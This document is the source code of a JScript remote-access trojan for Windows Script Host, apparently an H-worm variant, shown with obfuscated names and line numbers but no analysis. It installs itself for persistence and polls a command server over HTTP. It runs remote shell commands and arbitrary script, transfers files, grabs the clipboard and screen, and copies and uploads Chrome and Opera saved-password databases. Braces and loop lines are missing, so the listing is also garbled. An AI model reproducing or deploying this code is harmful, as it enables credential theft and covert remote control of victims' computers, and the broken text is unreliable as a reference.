Hworma

1. // ------------ Config --------------- //
2. var dyn74 = '100613900'
3. var yng97 = 87
4. var bgb15 = '%ProgramData%'
5. var lwx52 = 300
6. // ------------ public var ----------- //
7. var wch74 = WScript.CreateObject('WScript.Shell')
8. var ftx16 = WScript.CreateObject('scripting.filesystemobject')
9. var pcv92 = WScript.CreateObject('msxml2.xmlhttp')
10. var syc31 = WScript.CreateObject('WinNTSystemInfo')
11. // ------------ private var ----------- //
12. var vqs72 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
13. var rjb74 = WScript.scriptname
14. var eua22 = wch74.specialfolders('Startup') + '\\'
15. var bgb15 = wch74.expandenvironmentstrings(bgb15) + '\\'
16. var fog32 = '<
17. var wnd98,ijo62,bhw07
18. // ------------ Code Start ------------ //
19. // check -- antvrs on
20. if(qbp14() == "88FDB972"){WScript.Quit(0)}
21. // check -- antvrs off
22. yhp97()
23. wnd98 = ''
24. wnd98 = oju28 ('is-bekle','')
25. ijo62 = wnd98.split(fog32)
26. switch(ijo62[0])
27. case 'Sleep':
28. lwx52 = ijo62[1]
29. case 'readtext':
30. oju28('txtfile',bjw54(ijo62[1]))
31. case 'downfile':
32. oju28('filetransfer','BcorpFile' + acu36(ijo62[1]))
33. case 'upfile':
34. sbx61(ijo62[1] + dyn74 + '/a/' + ijo62[3] + ' ' + ijo62[2] + ijo62[3])
35. case 'clip-board':
36. oju28('is-clip',krf52())
37. case 'excecute':
38. sbx61(ijo62[1])
39. case 'PlanB':
40. pmv64(ijo62[1])
41. case 'GetPass':
42. tfi63()
43. case 'KeyMe':
44. oju28('My-Keys','BcorpKey' + bjw54(bgb15 + 'store.txt'))
45. case 'enum-driver':
46. oju28('is-enum-driver',kpb62())
47. case 'enum-faf':
48. oju28('is-enum-faf',nio87(ijo62[1]))
49. case 'enum-process':
50. oju28('is-enum-process',neu62())
51. case 'komutcu':
52. oju28('komutcu',wja82(ijo62[1]))
53. case 'komutcu2':
54. oju28('komutcu',bmg86(ijo62[1]))
55. kmb95(bgb15+'brat.tmp')
56. case 'screen-send':
57. egh31(ijo62[1])
58. case 'delete':
59. kmb95(ijo62[1])
60. case 'exit-process':
61. apf52(ijo62[1])
62. default:
63. case 'js-text':
64. eval(ijo62[1])
65. case 'vbs-text':
66. Exec(ijo62[1])
67. case 'message':
68. fxj92(ijo62[1])
69. case 'RenFile':
70. baa88(ijo62[1],ijo62[2])
71. case 'dizinver':
72. bgb15 = wch74.expandenvironmentstrings(ijo62[1]) + '\\'
73. }WScript.sleep(lwx52)
74. }catch(ult43){}
75. }while(true)
76. function yhp97(){
77. ftx16.CopyFile (WScript.scriptfullname,bgb15 + rjb74)
78. function oju28(ijo62,bhw07)
79. pcv92['open']('POST', 'http://' + dyn74 + ':' + yng97 + '/' + ijo62, false)
80. pcv92.setRequestHeader('user-agent:', yst77())
81. pcv92['send'](bhw07)
82. var xjc97 = pcv92['responsetext']
83. return xjc97
84. function yst77()
85. var glb39,pks30,swc22,ury87,kpc44
86. glb39 = qbp14() + fog32
87. glb39 = glb39 + syc31.UserName + fog32
88. var luq53 = GetObject('winmgmts:\\\\.\\root\\CIMV2')
89. var fjn56 = luq53.ExecQuery('SELECT * FROM Win32_OperatingSystem', 'WQL', 0x10
90. 0x20)
91. var urf75 = new Enumerator(fjn56)
92. var ucq81 = urf75.item()
93. ury87 = ucq81.Caption +' '+ ucq81.OSArchitecture
94. kpc44 = ucq81.SystemDrive
95. var bfs28 = GetObject('winmgmts:\\\\localhost\\root\\securitycenter2')
96. var hkk63 = bfs28.ExecQuery('select * from antivirusproduct','WQL', 0)
97. var hhc18 = new Enumerator(hkk63)
98. var jem99 = hhc18.item()
99. pks30 = jem99.displayname
100. }catch(ezp32){pks30 = 'Err'
101. try{swc22 = wch74.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0\\50727')
102. }catch(ezp32){swc22 = '-'
103. if(swc22 == '50727-50727'){swc22 = 'True'}
104. glb39 = glb39 + ury87 + fog32
105. glb39 = glb39 + rjb74 + fog32
106. glb39 = glb39 + pks30 + fog32
107. glb39 = glb39 + bgb15 + fog32
108. glb39 = glb39 + swc22 + fog32
109. glb39 = glb39 + 'C' + fog32
110. glb39 = glb39 + lwx52 + fog32
111. glb39 = glb39 + 'J' + fog32
112. return glb39
113. function qbp14(){
114. var njo83 = luq53.ExecQuery("SELECT * FROM Win32_LogicalDisk Where DeviceID = 'C:'")
115. var hhc18 = new Enumerator(njo83)
116. var uxx34 = jem99.VolumeSerialNumber
117. return uxx34
118. function sbx61(dul72)
119. wch74['run']('cmd.exe /c '+dul72,0)
120. catch(ult43){}
121. function pmv64(dul72)
122. wch74.Run(dul72,1)
123. function fxj92(dul72)
124. wch74.Popup(dul72)
125. function kpb62()
126. var s, n, e, d
127. e = new Enumerator(ftx16.Drives)
128. s = ''
129. e.atEnd()
130. e.moveNext())
131. { d = e.item()
132. s = s + d.DriveLetter+':'+'
133. '+d.DriveType+fog32
134. return('BcorpDriver' + s)
135. function nio87(dul72)
136. var fs, f, fc, s, fc1
137. s1 = ''
138. fs = new ActiveXObject('Scripting.FileSystemObject')
139. f = fs.GetFolder(dul72+'\\')
140. fc = new Enumerator(f.SubFolders)
141. fc.atEnd()
142. fc.moveNext())
143. s += fc.item()
144. s += '
145. '+''+'
146. '+'d'+'
147. '+fog32
148. fc1 = new Enumerator(f.files)
149. fc1.atEnd()
150. fc1.moveNext())
151. s1 += fc1.item()
152. s1 += '
153. '+fc1.item(0).size+'
154. '+'f'+'
155. return('BcorpFaf'+s+s1)
156. function neu62()
157. var npf82 = GetObject('WinMgmts:').InstancesOf('Win32_Process')
158. var pos85 = ''
159. gli28 = new Enumerator(npf82)
160. for (
161. gli28.atEnd()
162. gli28.moveNext())
163. var waa83 = gli28.item()
164. pos85 += waa83.Name + '
165. ' + waa83.ProcessID + '
166. ' + waa83.ExecutablePath + fog32
167. return('BcorpProccess' + pos85)
168. function ekr13(oyg46)
169. var wup34 = ''
170. wup34 = wup34 + oyg46.StdOut.Readline() + '<Satir>'
171. while(
172. oyg46.StdOut.AtEndOfStream)
173. wup34 = wup34 + oyg46.StdErr.Readline() + '<Satir>'
174. oyg46.StdErr.AtEndOfStream)
175. return(wup34)
176. function wja82(dul72) {
177. var oyg46 = wch74.Exec('%comspec% /c ' + dul72)
178. while (oyg46.Status == 0)
179. WScript.Sleep(1000)
180. var vfl33
181. while ( (vfl33 = ekr13(oyg46))
182. = -1) {
183. return('BcorpCmd1'+vfl33)
184. function bmg86(dul72) {
185. wch74['run']('%com'+'spec% /c '+dul72+' > '+bgb15+'brat.tmp',0)
186. WScript.sleep(1000)
187. return('BcorpCmd2'+bjw54(bgb15+'brat.tmp'))
188. function bjw54(spo66) {
189. var fp1 = ftx16.OpenTextFile(spo66, 1, true)
190. return fp1.ReadAll()
191. function baa88(oldname,newname) {
192. sbx61('ren ' + oldname + ' ' + newname)
193. function kmb95(dul72)
194. ftx16.DeleteFile(dul72)
195. ftx16.DeleteFolder(dul72)
196. function krf52()
197. var hqu92 = new ActiveXObject('htmlfile').parentWindow.clipboardData.getData('text')
198. return('BcorpClip'+hqu92)
199. function tfi63()
200. er0('filetransfer','BcorpPassCh')
201. if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'))
202. {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"' + ' ' + bgb15 + 'ChDb.sql')
203. WScript.Sleep(500)
204. oju28('filetransfer','BcorpPassCh' + acu36(bgb15 + 'ChDb.sql'))
205. if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'))
206. {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"' + ' ' + bgb15 + 'OpDb.sql')
207. oju28('filetransfer','BcorpPassOp' + acu36(bgb15 + 'OpDb.sql'))
208. function apf52(dul72)
209. sbx61('taskkill /F /T /PID ' + dul72)
210. function acu36(pepe) {
211. var rfx48 = new ActiveXObject('ADODB.Stream')
212. rfx48.Open()
213. rfx48.Type = 1
214. rfx48.LoadFromFile(pepe)
215. var wes77 = rfx48.Read()
216. var hym47 = new ActiveXObject('Microsoft.XMLDOM')
217. var fbs41 = hym47.createElement('tmp')
218. fbs41.dataType = 'bin.base64'
219. fbs41.nodeTypedValue = wes77
220. return(fbs41.text.replace(/[
221. A-Z\d+=\/]/gi, ''))
222. function egh31(pori)
223. oju28('filetransfer','BcorpImage' + acu36(bgb15 + 'kukuri.bmp'))
224. WScript.Sleep(400)
225. oju28('transfercomplate')
226. function er0()
227. {try{}catch(O){}}